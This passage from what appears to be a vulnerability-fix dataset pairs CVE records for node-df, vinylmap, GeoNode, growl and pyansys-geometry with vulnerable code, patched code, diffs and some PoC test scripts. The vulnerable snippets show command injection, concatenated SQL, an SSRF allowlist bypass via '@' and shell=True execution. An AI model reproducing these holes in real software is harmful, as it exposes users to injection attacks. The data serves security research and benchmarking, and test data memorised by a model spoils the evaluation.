that can allow an attacker to remote code execution by unsanitized input.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}}, "repo": "https://github.com/adriano-di-giovanni/node-df", "patch_url": ["https://github.com/adriano-di-giovanni/node-df/commit/72bcceab653bc064583d438072eb20f2d73654be"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_13_1", "commit": "c0b554a", "file_path": "lib/index.js", "start_line": 41, "end_line": 55, "snippet": " exec(command, function(err, stdout, stderr) {\n if (err) {\n callback(err)\n return\n }\n\n if (stderr) {\n callback(new Error(err))\n return\n }\n\n var entries = parse(stdout, options)\n\n callback(null, entries)\n })"}], "fix_func": [{"id": "fix_js_13_1", "commit": "72bcceab653bc064583d438072eb20f2d73654be", "file_path": "lib/index.js", "start_line": 41, "end_line": 60, "snippet": "// escaping chars to prevent command injection\n var escapeShell = function(command) {\n return '\"'+command.replace(/([\"\\s'$`\\])/g,'\\$1')+'\"'\n };\n exec(escapeShell(command), function(err, stdout, stderr) {\n if (err) {\n callback(err)\n return\n }\n\n if (stderr) {\n callback(new Error(err))\n return\n }\n\n var entries = parse(stdout, options)\n\n callback(null, entries)\n })"}], "vul_patch": "--- a/lib/index.js\n+++ b/lib/index.js\n@@ -1,4 +1,4 @@\n- exec(command, function(err, stdout, stderr) {\n+ exec(escapeShell(command), function(err, stdout, stderr) {\n if (err) {\n callback(err)\n return\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2019-15597:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/node-df\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\njest ./poc\n", "unit_test_cmd": " #!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2019-15597:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/node-df\ngit apply --whitespace=nowarn /workspace/fix.patch\nnpm test lib/__tests__/calcMultipliers.spec.js lib/__tests__/index.spec.js"} {"cve_id": "CVE-2015-10056", "cve_description": "A vulnerability was found in 2071174A vinylmap. It has been classified as critical. Affected is the function contact of the file recordstoreapp/views.py. The manipulation leads to sql injection. The name of the patch is b07b79a1e92cc62574ba0492cce000ef4a7bd25f. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-218400.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/2071174A/vinylmap", "patch_url": ["https://github.com/2071174A/vinylmap/commit/b07b79a1e92cc62574ba0492cce000ef4a7bd25f"], "programing_language": "Python", "vul_func": [{"id": "vul_py_378_1", "commit": "781d517b0d234d3fb51c9cb46584f0cf58e67675", "file_path": "recordstoreapp/views.py", "start_line": 25, "end_line": 47, "snippet": "def search(request):\n\tcontext_dict = {}\n\tif 'q' in request.GET and request.GET['q'] != '':\n\t\tq = request.GET['q']\n\t\tcursor = connection.cursor()\n\t\tcursor.execute(\"SELECT id,title,artist,cover FROM recordstoreapp_record WHERE title like '%\" + q + \"%' or artist like '%\" + q + \"%' or label like '%\" + q + \"%' or cat_no like '%\" + q + \"%';\")\n\t\trec_list=cursor.fetchall()\n\t\t\n\t\ttotal=len(rec_list)\n\t\tpg=int(request.GET['page']) if 'page' in request.GET else 1\n\t\tub=min(pg*12, total)\n\n\t\tcontext_dict['rec_list'] = rec_list[(pg-1)*12:ub]\n\t\tmaxrange = int(total/12)\n\t\tif total%12 > 0: \n\t\t\tmaxrange = maxrange + 1\n\t\tif maxrange == 1: \n\t\t\tmaxrange = 0\n\t\tcontext_dict['range'] = range(1,maxrange+1)\n\t\tprint total\n\t\tcontext_dict['q'] = q\n\n\treturn render(request, 'search.html', context_dict)"}], "fix_func": [{"id": "fix_py_378_1", "commit": "b07b79a1e92cc62574ba0492cce000ef4a7bd25f", "file_path": "recordstoreapp/views.py", "start_line": 25, "end_line": 49, "snippet": "def search(request):\n\tcontext_dict = {}\n\tq = request.GET['q'].replace('%', '').replace('_', '').strip()\n\tif 'q' in request.GET and q != '':\n\t\tq = '%' + q + '%'\n\t\tcursor = connection.cursor()\n\t\tcursor.execute(\"SELECT id,title,artist,cover FROM recordstoreapp_record WHERE title like %s or artist like %s or label like %s or cat_no like %s;\", [q,q,q,q])\n\t\trec_list=cursor.fetchall()\n\t\t\n\n\t\ttotal=len(rec_list)\n\t\tpg=int(request.GET['page']) if 'page' in request.GET else 1\n\t\tub=min(pg*12, total)\n\n\t\tcontext_dict['rec_list'] = rec_list[(pg-1)*12:ub]\n\t\tmaxrange = int(total/12)\n\t\tif total%12 > 0: \n\t\t\tmaxrange = maxrange + 1\n\t\tif maxrange == 1: \n\t\t\tmaxrange = 0\n\t\tcontext_dict['range'] = range(1,maxrange+1)\n\t\tprint total\n\t\tcontext_dict['q'] = q\n\n\treturn render(request, 'search.html', context_dict)"}], "vul_patch": "--- a/recordstoreapp/views.py\n+++ b/recordstoreapp/views.py\n@@ -1,11 +1,13 @@\n def search(request):\n \tcontext_dict = {}\n-\tif 'q' in request.GET and request.GET['q'] != '':\n-\t\tq = request.GET['q']\n+\tq = request.GET['q'].replace('%', '').replace('_', '').strip()\n+\tif 'q' in request.GET and q != '':\n+\t\tq = '%' + q + '%'\n \t\tcursor = connection.cursor()\n-\t\tcursor.execute(\"SELECT id,title,artist,cover FROM recordstoreapp_record WHERE title like '%\" + q + \"%' or artist like '%\" + q + \"%' or label like '%\" + q + \"%' or cat_no like '%\" + q + \"%';\")\n+\t\tcursor.execute(\"SELECT id,title,artist,cover FROM recordstoreapp_record WHERE title like %s or artist like %s or label like %s or cat_no like %s;\", [q,q,q,q])\n \t\trec_list=cursor.fetchall()\n \t\t\n+\n \t\ttotal=len(rec_list)\n \t\tpg=int(request.GET['page']) if 'page' in request.GET else 1\n \t\tub=min(pg*12, total)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-42439", "cve_description": "GeoNode is an open source platform that facilitates the creation, sharing, and collaborative use of geospatial data. A SSRF vulnerability exists starting in version 3.2.0, bypassing existing controls on the software. This can allow a user to request internal services for a full read SSRF, returning any data from the internal network. The application is using a whitelist, but the whitelist can be bypassed. The bypass will trick the application that the first host is a whitelisted address, but the browser will use `@` or `%40` as a credential to the host geoserver on port 8080, this will return the data to that host on the response. Version 4.1.3.post1 is the first available version that contains a patch.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/GeoNode/geonode", "patch_url": ["https://github.com/GeoNode/geonode/commit/79ac6e70419c2e0261548bed91c159b54ff35b8d"], "programing_language": "Python", "vul_func": [{"id": "vul_py_261_1", "commit": "abd1baf", "file_path": "geonode/utils.py", "start_line": 1910, "end_line": 1927, "snippet": "def extract_ip_or_domain(url):\n ip_regex = re.compile(\"^(?:http://|https://)(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})\")\n domain_regex = re.compile(\"^(?:http://|https://)([a-zA-Z0-9.-]+)\")\n\n match = ip_regex.findall(url)\n if len(match):\n ip_address = match[0]\n try:\n ipaddress.ip_address(ip_address) # Validate the IP address\n return ip_address\n except ValueError:\n pass\n\n match = domain_regex.findall(url)\n if len(match):\n return match[0]\n\n return None"}], "fix_func": [{"id": "fix_py_261_2", "commit": "79ac6e7", "file_path": "geonode/utils.py", "start_line": 1911, "end_line": 1921, "snippet": "def remove_credentials_from_url(url):\n # Parse the URL\n parsed_url = urlparse(url)\n\n # Remove the username and password from the parsed URL\n parsed_url = parsed_url._replace(netloc=parsed_url.netloc.split(\"@\")[-1])\n\n # Reconstruct the URL without credentials\n cleaned_url = urlunparse(parsed_url)\n\n return cleaned_url"}, {"id": "fix_py_261_1", "commit": "79ac6e7", "file_path": "geonode/utils.py", "start_line": 1924, "end_line": 1944, "snippet": "def extract_ip_or_domain(url):\n # Decode the URL to handle percent-encoded characters\n _url = remove_credentials_from_url(unquote(url))\n\n ip_regex = re.compile(\"^(?:http://|https://)(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})\")\n domain_regex = re.compile(\"^(?:http://|https://)([a-zA-Z0-9.-]+)\")\n\n match = ip_regex.findall(_url)\n if len(match):\n ip_address = match[0]\n try:\n ipaddress.ip_address(ip_address) # Validate the IP address\n return ip_address\n except ValueError:\n pass\n\n match = domain_regex.findall(_url)\n if len(match):\n return match[0]\n\n return None"}], "vul_patch": "--- a/geonode/utils.py\n+++ b/geonode/utils.py\n@@ -1,8 +1,11 @@\n def extract_ip_or_domain(url):\n+ # Decode the URL to handle percent-encoded characters\n+ _url = remove_credentials_from_url(unquote(url))\n+\n ip_regex = re.compile(\"^(?:http://|https://)(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})\")\n domain_regex = re.compile(\"^(?:http://|https://)([a-zA-Z0-9.-]+)\")\n \n- match = ip_regex.findall(url)\n+ match = ip_regex.findall(_url)\n if len(match):\n ip_address = match[0]\n try:\n@@ -11,7 +14,7 @@\n except ValueError:\n pass\n \n- match = domain_regex.findall(url)\n+ match = domain_regex.findall(_url)\n if len(match):\n return match[0]\n \n\n--- /dev/null\n+++ b/geonode/utils.py\n@@ -0,0 +1,11 @@\n+def remove_credentials_from_url(url):\n+ # Parse the URL\n+ parsed_url = urlparse(url)\n+\n+ # Remove the username and password from the parsed URL\n+ parsed_url = parsed_url._replace(netloc=parsed_url.netloc.split(\"@\")[-1])\n+\n+ # Reconstruct the URL without credentials\n+ cleaned_url = urlunparse(parsed_url)\n+\n+ return cleaned_url\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-16042", "cve_description": "Growl adds growl notification support to nodejs. Growl before 1.10.2 does not properly sanitize input before passing it to exec, allowing for arbitrary command execution.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/tj/node-growl", "patch_url": ["https://github.com/tj/node-growl/commit/d71177d5331c9de4658aca62e0ac921f178b0669"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_44_2", "commit": "dc8aae0", "file_path": "lib/growl.js", "start_line": 164, "end_line": 290, "snippet": "function growl(msg, options, fn) {\n var image\n , args\n , options = options || {}\n , fn = fn || function(){};\n\n if (options.exec) {\n cmd = {\n type: \"Custom\"\n , pkg: options.exec\n , range: []\n };\n }\n\n // noop\n if (!cmd) return fn(new Error('growl not supported on this platform'));\n args = [cmd.pkg];\n\n // image\n if (image = options.image) {\n switch(cmd.type) {\n case 'Darwin-Growl':\n var flag, ext = path.extname(image).substr(1)\n flag = flag || ext == 'icns' && 'iconpath'\n flag = flag || /^[A-Z]/.test(image) && 'appIcon'\n flag = flag || /^png|gif|jpe?g$/.test(ext) && 'image'\n flag = flag || ext && (image = ext) && 'icon'\n flag = flag || 'icon'\n args.push('--' + flag, quote(image))\n break;\n case 'Darwin-NotificationCenter':\n args.push(cmd.icon, quote(image));\n break;\n case 'Linux':\n args.push(cmd.icon, quote(image));\n // libnotify defaults to sticky, set a hint for transient notifications\n if (!options.sticky) args.push('--hint=int:transient:1');\n break;\n case 'Windows':\n args.push(cmd.icon + quote(image));\n break;\n }\n }\n\n // sticky\n if (options.sticky) args.push(cmd.sticky);\n\n // priority\n if (options.priority) {\n var priority = options.priority + '';\n var checkindexOf = cmd.priority.range.indexOf(priority);\n if (~cmd.priority.range.indexOf(priority)) {\n args.push(cmd.priority, options.priority);\n }\n }\n\n //sound\n if(options.sound && cmd.type === 'Darwin-NotificationCenter'){\n args.push(cmd.sound, options.sound)\n }\n\n // name\n if (options.name && cmd.type === \"Darwin-Growl\") {\n args.push('--name', options.name);\n }\n\n switch(cmd.type) {\n case 'Darwin-Growl':\n args.push(cmd.msg);\n args.push(quote(msg).replace(/\\\\n/g, '\\n'));\n if (options.title) args.push(quote(options.title));\n break;\n case 'Darwin-NotificationCenter':\n args.push(cmd.msg);\n var stringifiedMsg = quote(msg);\n var escapedMsg = stringifiedMsg.replace(/\\\\n/g, '\\n');\n args.push(escapedMsg);\n if (options.title) {\n args.push(cmd.title);\n args.push(quote(options.title));\n }\n if (options.subtitle) {\n args.push(cmd.subtitle);\n args.push(quote(options.subtitle));\n }\n if (options.url) {\n args.push(cmd.url);\n args.push(quote(options.url));\n }\n break;\n case 'Linux-Growl':\n args.push(cmd.msg);\n args.push(quote(msg).replace(/\\\\n/g, '\\n'));\n if (options.title) args.push(quote(options.title));\n if (cmd.host) {\n args.push(cmd.host.cmd, cmd.host.hostname)\n }\n break;\n case 'Linux':\n if (options.title) {\n args.push(quote(options.title));\n args.push(cmd.msg);\n args.push(quote(msg).replace(/\\\\n/g, '\\n'));\n } else {\n args.push(quote(msg).replace(/\\\\n/g, '\\n'));\n }\n break;\n case 'Windows':\n args.push(quote(msg).replace(/\\\\n/g, '\\n'));\n if (options.title) args.push(cmd.title + quote(options.title));\n if (options.url) args.push(cmd.url + quote(options.url));\n break;\n case 'Custom':\n args[0] = (function(origCommand) {\n var message = options.title\n ? options.title + ': ' + msg\n : msg;\n var command = origCommand.replace(/(^|[^%])%s/g, '$1' + quote(message));\n if (command === origCommand) args.push(quote(message));\n return command;\n })(args[0]);\n break;\n }\n\n // execute\n exec(args.join(' '), fn);\n};"}], "fix_func": [{"id": "fix_js_44_2", "commit": "d71177d5331c9de4658aca62e0ac921f178b0669", "file_path": "lib/growl.js", "start_line": 163, "end_line": 289, "snippet": "function growl(msg, options, fn) {\n var image\n , args\n , options = options || {}\n , fn = fn || function(){};\n\n if (options.exec) {\n cmd = {\n type: \"Custom\"\n , pkg: options.exec\n , range: []\n };\n }\n\n // noop\n if (!cmd) return fn(new Error('growl not supported on this platform'));\n args = [cmd.pkg];\n\n // image\n if (image = options.image) {\n switch(cmd.type) {\n case 'Darwin-Growl':\n var flag, ext = path.extname(image).substr(1)\n flag = flag || ext == 'icns' && 'iconpath'\n flag = flag || /^[A-Z]/.test(image) && 'appIcon'\n flag = flag || /^png|gif|jpe?g$/.test(ext) && 'image'\n flag = flag || ext && (image = ext) && 'icon'\n flag = flag || 'icon'\n args.push('--' + flag, image)\n break;\n case 'Darwin-NotificationCenter':\n args.push(cmd.icon, image);\n break;\n case 'Linux':\n args.push(cmd.icon, image);\n // libnotify defaults to sticky, set a hint for transient notifications\n if (!options.sticky) args.push('--hint=int:transient:1');\n break;\n case 'Windows':\n args.push(cmd.icon + image);\n break;\n }\n }\n\n // sticky\n if (options.sticky) args.push(cmd.sticky);\n\n // priority\n if (options.priority) {\n var priority = options.priority + '';\n var checkindexOf = cmd.priority.range.indexOf(priority);\n if (~cmd.priority.range.indexOf(priority)) {\n args.push(cmd.priority, options.priority);\n }\n }\n\n //sound\n if(options.sound && cmd.type === 'Darwin-NotificationCenter'){\n args.push(cmd.sound, options.sound)\n }\n\n // name\n if (options.name && cmd.type === \"Darwin-Growl\") {\n args.push('--name', options.name);\n }\n\n switch(cmd.type) {\n case 'Darwin-Growl':\n args.push(cmd.msg);\n args.push(msg.replace(/\\\\n/g, '\\n'));\n if (options.title) args.push(options.title);\n break;\n case 'Darwin-NotificationCenter':\n args.push(cmd.msg);\n var stringifiedMsg = msg;\n var escapedMsg = stringifiedMsg.replace(/\\\\n/g, '\\n');\n args.push(escapedMsg);\n if (options.title) {\n args.push(cmd.title);\n args.push(options.title);\n }\n if (options.subtitle) {\n args.push(cmd.subtitle);\n args.push(options.subtitle);\n }\n if (options.url) {\n args.push(cmd.url);\n args.push(options.url);\n }\n break;\n case 'Linux-Growl':\n args.push(cmd.msg);\n args.push(msg.replace(/\\\\n/g, '\\n'));\n if (options.title) args.push(options.title);\n if (cmd.host) {\n args.push(cmd.host.cmd, cmd.host.hostname)\n }\n break;\n case 'Linux':\n if (options.title) {\n args.push(options.title);\n args.push(cmd.msg);\n args.push(msg.replace(/\\\\n/g, '\\n'));\n } else {\n args.push(msg.replace(/\\\\n/g, '\\n'));\n }\n break;\n case 'Windows':\n args.push(msg.replace(/\\\\n/g, '\\n'));\n if (options.title) args.push(cmd.title + options.title);\n if (options.url) args.push(cmd.url + options.url);\n break;\n case 'Custom':\n args[0] = (function(origCommand) {\n var message = options.title\n ? options.title + ': ' + msg\n : msg;\n var command = origCommand.replace(/(^|[^%])%s/g, '$1' + message);\n if (command === origCommand) args.push(message);\n return command;\n })(args[0]);\n break;\n }\n var cmd_to_exec = args[0];\n args.shift();\n spawn(cmd_to_exec, args);\n};"}], "vul_patch": "--- a/lib/growl.js\n+++ b/lib/growl.js\n@@ -26,18 +26,18 @@\n flag = flag || /^png|gif|jpe?g$/.test(ext) && 'image'\n flag = flag || ext && (image = ext) && 'icon'\n flag = flag || 'icon'\n- args.push('--' + flag, quote(image))\n+ args.push('--' + flag, image)\n break;\n case 'Darwin-NotificationCenter':\n- args.push(cmd.icon, quote(image));\n+ args.push(cmd.icon, image);\n break;\n case 'Linux':\n- args.push(cmd.icon, quote(image));\n+ args.push(cmd.icon, image);\n // libnotify defaults to sticky, set a hint for transient notifications\n if (!options.sticky) args.push('--hint=int:transient:1');\n break;\n case 'Windows':\n- args.push(cmd.icon + quote(image));\n+ args.push(cmd.icon + image);\n break;\n }\n }\n@@ -67,61 +67,61 @@\n switch(cmd.type) {\n case 'Darwin-Growl':\n args.push(cmd.msg);\n- args.push(quote(msg).replace(/\\\\n/g, '\\n'));\n- if (options.title) args.push(quote(options.title));\n+ args.push(msg.replace(/\\\\n/g, '\\n'));\n+ if (options.title) args.push(options.title);\n break;\n case 'Darwin-NotificationCenter':\n args.push(cmd.msg);\n- var stringifiedMsg = quote(msg);\n+ var stringifiedMsg = msg;\n var escapedMsg = stringifiedMsg.replace(/\\\\n/g, '\\n');\n args.push(escapedMsg);\n if (options.title) {\n args.push(cmd.title);\n- args.push(quote(options.title));\n+ args.push(options.title);\n }\n if (options.subtitle) {\n args.push(cmd.subtitle);\n- args.push(quote(options.subtitle));\n+ args.push(options.subtitle);\n }\n if (options.url) {\n args.push(cmd.url);\n- args.push(quote(options.url));\n+ args.push(options.url);\n }\n break;\n case 'Linux-Growl':\n args.push(cmd.msg);\n- args.push(quote(msg).replace(/\\\\n/g, '\\n'));\n- if (options.title) args.push(quote(options.title));\n+ args.push(msg.replace(/\\\\n/g, '\\n'));\n+ if (options.title) args.push(options.title);\n if (cmd.host) {\n args.push(cmd.host.cmd, cmd.host.hostname)\n }\n break;\n case 'Linux':\n if (options.title) {\n- args.push(quote(options.title));\n+ args.push(options.title);\n args.push(cmd.msg);\n- args.push(quote(msg).replace(/\\\\n/g, '\\n'));\n+ args.push(msg.replace(/\\\\n/g, '\\n'));\n } else {\n- args.push(quote(msg).replace(/\\\\n/g, '\\n'));\n+ args.push(msg.replace(/\\\\n/g, '\\n'));\n }\n break;\n case 'Windows':\n- args.push(quote(msg).replace(/\\\\n/g, '\\n'));\n- if (options.title) args.push(cmd.title + quote(options.title));\n- if (options.url) args.push(cmd.url + quote(options.url));\n+ args.push(msg.replace(/\\\\n/g, '\\n'));\n+ if (options.title) args.push(cmd.title + options.title);\n+ if (options.url) args.push(cmd.url + options.url);\n break;\n case 'Custom':\n args[0] = (function(origCommand) {\n var message = options.title\n ? options.title + ': ' + msg\n : msg;\n- var command = origCommand.replace(/(^|[^%])%s/g, '$1' + quote(message));\n- if (command === origCommand) args.push(quote(message));\n+ var command = origCommand.replace(/(^|[^%])%s/g, '$1' + message);\n+ if (command === origCommand) args.push(message);\n return command;\n })(args[0]);\n break;\n }\n-\n- // execute\n- exec(args.join(' '), fn);\n+ var cmd_to_exec = args[0];\n+ args.shift();\n+ spawn(cmd_to_exec, args);\n };\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2017-16042:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/node-growl\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\njest ./poc\n", "unit_test_cmd": null} {"cve_id": "CVE-2024-29189", "cve_description": "PyAnsys Geometry is a Python client library for the Ansys Geometry service and other CAD Ansys products. On file src/ansys/geometry/core/connection/product_instance.py, upon calling this method _start_program directly, users could exploit its usage to perform malicious operations on the current machine where the script is ran. This vulnerability is fixed in 0.3.3 and 0.4.12.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/ansys/pyansys-geometry", "patch_url": ["https://github.com/ansys/pyansys-geometry/commit/f82346b9432b06532e84f3278125f5879b4e9f3f", "https://github.com/ansys/pyansys-geometry/commit/902071701c4f3a8258cbaa46c28dc0a65442d1bc"], "programing_language": "Python", "vul_func": [{"id": "vul_py_385_1", "commit": "138ae18f810b3e556f90ca12164fc68bc76f063c", "file_path": "src/ansys/geometry/core/connection/product_instance.py", "start_line": 170, "end_line": 311, "snippet": "def prepare_and_start_backend(\n backend_type: BackendType,\n product_version: int = None,\n host: str = \"localhost\",\n port: int = None,\n enable_trace: bool = False,\n log_level: int = 2,\n api_version: ApiVersions = ApiVersions.LATEST,\n timeout: int = 150,\n manifest_path: str = None,\n logs_folder: str = None,\n hidden: bool = False,\n) -> \"Modeler\":\n \"\"\"\n Start the requested service locally using the ``ProductInstance`` class.\n\n When calling this method, a standalone service or product session is started.\n By default, if an endpoint is specified (by defining `host` and `port` parameters)\n but the endpoint is not available, the startup will fail. Otherwise, it will try to\n launch its own service.\n\n Parameters\n ----------\n product_version: ``int``, optional\n The product version to be started. Goes from v23.2.1 to\n the latest. Default is ``None``.\n If a specific product version is requested but not installed locally,\n a SystemError will be raised.\n host: str, optional\n IP address at which the Geometry service will be deployed. By default,\n its value will be ``localhost``.\n port : int, optional\n Port at which the Geometry service will be deployed. By default, its\n value will be ``None``.\n enable_trace : bool, optional\n Boolean enabling the logs trace on the Geometry service console window.\n By default its value is ``False``.\n log_level : int, optional\n Backend's log level from 0 to 3:\n 0: Chatterbox\n 1: Debug\n 2: Warning\n 3: Error\n\n The default is ``2`` (Warning).\n api_version: ``ApiVersions``, optional\n The backend's API version to be used at runtime. Goes from API v21 to\n the latest. Default is ``ApiVersions.LATEST``.\n timeout : int, optional\n Timeout for starting the backend startup process. The default is 150.\n manifest_path : str, optional\n Used to specify a manifest file path for the ApiServerAddin. This way,\n it is possible to run an ApiServerAddin from a version an older product\n version. Only applicable for Ansys Discovery and Ansys SpaceClaim.\n logs_folder : sets the backend's logs folder path. If nothing is defined,\n the backend will use its default path.\n hidden : starts the product hiding its UI. Default is ``False``.\n\n Raises\n ------\n ConnectionError\n If the specified endpoint is already in use, a connection error will be raised.\n SystemError\n If there is not an Ansys product 23.2 version or later installed\n or if a specific product's version is requested but not installed locally then\n a SystemError will be raised.\n\n Returns\n -------\n Modeler\n Instance of the Geometry service.\n \"\"\"\n from ansys.geometry.core.modeler import Modeler\n\n port = _check_port_or_get_one(port)\n installations = get_available_ansys_installations()\n if product_version != None:\n _check_version_is_available(product_version, installations)\n else:\n product_version = get_latest_ansys_installation()[0]\n _check_minimal_versions(product_version)\n\n args = []\n env_copy = _get_common_env(\n host=host,\n port=port,\n enable_trace=enable_trace,\n log_level=log_level,\n logs_folder=logs_folder,\n )\n\n if backend_type == BackendType.DISCOVERY:\n args.append(os.path.join(installations[product_version], DISCOVERY_FOLDER, DISCOVERY_EXE))\n if hidden is True:\n args.append(BACKEND_DISCOVERY_HIDDEN)\n\n # Here begins the spaceclaim arguments.\n args.append(BACKEND_SPACECLAIM_OPTIONS)\n args.append(\n BACKEND_ADDIN_MANIFEST_ARGUMENT\n + _manifest_path_provider(product_version, installations, manifest_path)\n )\n env_copy[BACKEND_API_VERSION_VARIABLE] = str(api_version)\n\n elif backend_type == BackendType.SPACECLAIM:\n args.append(os.path.join(installations[product_version], SPACECLAIM_FOLDER, SPACECLAIM_EXE))\n if hidden is True:\n args.append(BACKEND_SPACECLAIM_HIDDEN)\n args.append(BACKEND_SPLASH_OFF)\n args.append(\n BACKEND_ADDIN_MANIFEST_ARGUMENT\n + _manifest_path_provider(product_version, installations, manifest_path)\n )\n env_copy[BACKEND_API_VERSION_VARIABLE] = str(api_version)\n env_copy[BACKEND_SPACECLAIM_HIDDEN_ENVVAR_KEY] = BACKEND_SPACECLAIM_HIDDEN_ENVVAR_VALUE\n\n elif backend_type == BackendType.WINDOWS_SERVICE:\n latest_version = get_latest_ansys_installation()[0]\n args.append(\n os.path.join(\n installations[latest_version], WINDOWS_GEOMETRY_SERVICE_FOLDER, GEOMETRY_SERVICE_EXE\n )\n )\n else:\n raise RuntimeError(\n f\"Cannot connect to backend {backend_type.name} using ``prepare_and_start_backend()``\"\n )\n\n LOG.info(f\"Launching ProductInstance for {backend_type.name}\")\n LOG.debug(f\"Args: {args}\")\n LOG.debug(f\"Environment variables: {env_copy}\")\n\n instance = ProductInstance(_start_program(args, env_copy).pid)\n\n # Verify that the backend is ready to accept connections\n # before returning the Modeler instance.\n LOG.info(\"Waiting for backend to be ready...\")\n _wait_for_backend(host, port, timeout)\n\n return Modeler(\n host=host, port=port, timeout=timeout, product_instance=instance, backend_type=backend_type\n )"}, {"id": "vul_py_385_2", "commit": "138ae18f810b3e556f90ca12164fc68bc76f063c", "file_path": "src/ansys/geometry/core/connection/product_instance.py", "start_line": 403, "end_line": 429, "snippet": "def _start_program(args: List[str], local_env: Dict[str, str]) -> subprocess.Popen:\n \"\"\"\n Start the program where the path is the first item of the ``args`` array argument.\n\n Parameters\n ----------\n args : List[str]\n List of arguments to be passed to the program. The first list's item shall\n be the program path.\n local_env : Dict[str,str]\n Environment variables to be passed to the program.\n\n Returns\n -------\n subprocess.Popen\n The subprocess object.\n \"\"\"\n return subprocess.Popen(\n args,\n shell=os.name != \"nt\",\n stdin=subprocess.DEVNULL,\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL,\n env=local_env,\n )\n\n"}], "fix_func": [{"id": "fix_py_385_1", "commit": "f82346b9432b06532e84f3278125f5879b4e9f3f", "file_path": "src/ansys/geometry/core/connection/product_instance.py", "start_line": 170, "end_line": 314, "snippet": "def prepare_and_start_backend(\n backend_type: BackendType,\n product_version: int = None,\n host: str = \"localhost\",\n port: int = None,\n enable_trace: bool = False,\n log_level: int = 2,\n api_version: ApiVersions = ApiVersions.LATEST,\n timeout: int = 150,\n manifest_path: str = None,\n logs_folder: str = None,\n hidden: bool = False,\n) -> \"Modeler\":\n \"\"\"\n Start the requested service locally using the ``ProductInstance`` class.\n\n When calling this method, a standalone service or product session is started.\n By default, if an endpoint is specified (by defining `host` and `port` parameters)\n but the endpoint is not available, the startup will fail. Otherwise, it will try to\n launch its own service.\n\n Parameters\n ----------\n product_version: ``int``, optional\n The product version to be started. Goes from v23.2.1 to\n the latest. Default is ``None``.\n If a specific product version is requested but not installed locally,\n a SystemError will be raised.\n host: str, optional\n IP address at which the Geometry service will be deployed. By default,\n its value will be ``localhost``.\n port : int, optional\n Port at which the Geometry service will be deployed. By default, its\n value will be ``None``.\n enable_trace : bool, optional\n Boolean enabling the logs trace on the Geometry service console window.\n By default its value is ``False``.\n log_level : int, optional\n Backend's log level from 0 to 3:\n 0: Chatterbox\n 1: Debug\n 2: Warning\n 3: Error\n\n The default is ``2`` (Warning).\n api_version: ``ApiVersions``, optional\n The backend's API version to be used at runtime. Goes from API v21 to\n the latest. Default is ``ApiVersions.LATEST``.\n timeout : int, optional\n Timeout for starting the backend startup process. The default is 150.\n manifest_path : str, optional\n Used to specify a manifest file path for the ApiServerAddin. This way,\n it is possible to run an ApiServerAddin from a version an older product\n version. Only applicable for Ansys Discovery and Ansys SpaceClaim.\n logs_folder : sets the backend's logs folder path. If nothing is defined,\n the backend will use its default path.\n hidden : starts the product hiding its UI. Default is ``False``.\n\n Raises\n ------\n ConnectionError\n If the specified endpoint is already in use, a connection error will be raised.\n SystemError\n If there is not an Ansys product 23.2 version or later installed\n or if a specific product's version is requested but not installed locally then\n a SystemError will be raised.\n\n Returns\n -------\n 